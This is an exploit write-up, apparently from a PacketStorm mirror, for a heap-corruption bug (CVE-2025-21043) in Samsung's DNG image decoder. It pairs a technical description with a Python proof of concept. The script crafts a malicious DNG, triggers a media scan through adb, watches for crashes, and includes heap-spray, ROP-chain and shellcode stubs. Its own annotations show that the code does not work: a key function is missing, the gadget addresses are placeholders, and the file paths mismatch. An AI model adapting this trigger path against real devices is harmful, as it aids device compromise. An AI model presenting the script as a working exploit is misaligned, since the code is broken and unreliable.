## https://sploitus.com/exploit?id=PACKETSTORM:215132
=============================================================================================================================================
    | # Title     : Samsung QuramDNG Heap Exploitation via Malformed DNG (libimagecodec.quram.so)                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : System built-in component. No standalone download available.                                                                  |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211370/ & CVE-2025-21043
    
    [+] Summary : A vulnerability exists in Samsung's image decoding library (libimagecodec.quram.so) responsible for parsing Digital Negatives (DNG).
                  A malformed DNG containing oversized IFD entries can cause heap corruption.
                  With precise heap grooming, this condition may lead to remote code execution when the malicious DNG is decoded.
    
    [+] Affected Platforms (Likely Impact)
    
    Devices using Quram Codec and containing vulnerable libimagecodec.quram.so, typically:
    
    Galaxy S22 / S23 / S24 series
    
    Galaxy Z Fold / Z Flip
    
    Galaxy A and Tab series
    
    Any Samsung model using the Quram decoder before SMR-SEP-2025
    
    [+] OS Builds Affected:
    
    Android builds where the Quram codec is present and security patch level < September 2025
    
    [+] Technical Description (Root Cause)
    
    libimagecodec.quram.so fails to sanitize the size of metadata entries when parsing a DNG file:
    
    The IFD entry count is taken from the attacker-controlled file.
    
    Size validation is missing.
    
    Heap allocator metadata and adjacent buffers may be overwritten.
    
    Controlled overwrite can result in hijacked code execution.
    
    Critical vulnerable function:
    
    doMapPoly16()
    
    located inside Quram image parsing logic.
    
    Instructions For Saving:
    ------------------------
    1) Save file as:
       poc.py
    
    Instructions For Running:
    -------------------------
    python3 poc.py
    		  
    
    [+]  POC : 
    
    import os
    import subprocess
    import time
    
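    class QuramDngExploit:
        """Proof-of-concept driver for the libimagecodec.quram.so DNG bug (CVE-2025-21043).

        As published this class is a non-functional skeleton: ``craft_exploit``
        calls ``create_malicious_dng``, which is not defined anywhere in this file
        or imported; the ROP gadget table holds placeholder addresses and is never
        used; the "shellcode" is four NUL bytes that are never used.  What remains
        is an outline of the intended trigger path: write a DNG, broadcast
        MEDIA_SCANNER_SCAN_FILE through adb, then watch logcat for a crash.
        """

        def __init__(self):
            # Never assigned anywhere else in this file; kept so callers that
            # read it keep working.
            self.malicious_dng = None

        def craft_exploit(self):
            """Return the bytes of the crafted DNG.

            Raises:
                NameError: ``create_malicious_dng`` is not defined in this file
                    (nor imported), so the call fails as published.
            """
            print("[*] Crafting malicious DNG file...")
            return create_malicious_dng()

        def spray_heap(self):
            """Heap-spray stub: returns None.

            Only binds a Java source snippet to a local and then discards it;
            nothing is compiled, pushed or executed.
            """
            spray_code = """
            import java.util.ArrayList;
            
            public class HeapSpray {
                private static ArrayList<byte[]> sprayList = new ArrayList<>();
                
                public static void spray(int count, int size) {
                    for (int i = 0; i < count; i++) {
                        byte[] buffer = new byte[size];
                        // Fill with pointer-like values
                        for (int j = 0; j < size; j += 8) {
                            // Address we want to write
                            buffer[j] = (byte)0x41;
                        }
                        sprayList.add(buffer);
                    }
                }
            }
            """

        def trigger(self):
            """Write the crafted DNG and ask the media scanner to decode it.

            NOTE(review): ``open(temp_file, 'wb')`` runs on the host executing
            this script, so the write targets ``/data/local/tmp`` on the host,
            while the broadcast names that path on the device; as written the
            two never refer to the same file.  The ``subprocess.run`` result is
            not checked, so an adb failure goes unnoticed.  Blocks in
            ``monitor_logcat`` afterwards (see that method).
            """
            print("[*] Triggering vulnerability...")

            temp_file = "/data/local/tmp/exploit.dng"
            with open(temp_file, 'wb') as f:
                # Raises NameError as published (see craft_exploit).
                f.write(self.craft_exploit())

            cmd = [
                'adb', 'shell',
                'am', 'broadcast',
                '-a', 'android.intent.action.MEDIA_SCANNER_SCAN_FILE',
                '-d', f'file://{temp_file}'
            ]
            subprocess.run(cmd)

            print("[*] Waiting for com.samsung.ipservice to process file...")
            time.sleep(10)

            self.monitor_logcat()

        def monitor_logcat(self):
            """Stream ``adb logcat -s DEBUG`` until a line mentions SIGSEGV or the codec.

            Blocks indefinitely if no matching line ever appears.  The logcat
            child is terminated and its pipe closed on the way out, so a detected
            crash no longer leaves a background ``adb logcat`` running (the
            published version never reaped it).
            """
            print("[*] Monitoring logcat for crashes...")
            with subprocess.Popen(
                ['adb', 'logcat', '-s', 'DEBUG'],
                stdout=subprocess.PIPE,
                # stderr was piped but never read; DEVNULL avoids the child
                # stalling on a full stderr pipe.
                stderr=subprocess.DEVNULL,
            ) as logcat:
                try:
                    for raw in logcat.stdout:
                        text = raw.decode('utf-8', errors='ignore')
                        if 'SIGSEGV' in text or 'libimagecodec.quram' in text:
                            print("[+] Crash detected!")
                            print(text)
                            break
                finally:
                    # logcat never exits on its own; stop it so the context
                    # manager's wait() returns.
                    logcat.terminate()

        def build_rop_chain(self):
            """Return the ARM64 ROP chain — currently always an empty list.

            The gadget table below holds placeholder values and is never
            consulted.  In the published script this dict was over-indented,
            which made the whole module fail to import with IndentationError.
            """
            rop_chain = []
            gadgets = {
                'pop_x0': 0x123456,  # placeholder
                'pop_x1': 0x123457,
                'system': 0x123458,
                'blr_x19': 0x123459,
            }
            return rop_chain

        def achieve_rce(self):
            """Stub: prints a status line and returns False.

            ``shellcode`` is four NUL bytes and is never used; no code
            execution is attempted.  Nothing in this file calls this method.
            """
            print("[*] Attempting to achieve RCE...")
            shellcode = (
                b"\x00\x00\x00\x00"
            )
            return False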
    
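    if __name__ == "__main__":
        exploit = QuramDngExploit()

        print("[*] Starting QuramDng exploit (CVE-2025-21043)")
        print("[*] Target: libimagecodec.quram.so")
        print("[*] Vulnerability: OOB Write in doMapPoly16")

        # trigger() crafts the DNG itself; the extra craft_exploit() call the
        # published script made here only discarded its result.
        exploit.trigger()

        print("[*] Exploit completed")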
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================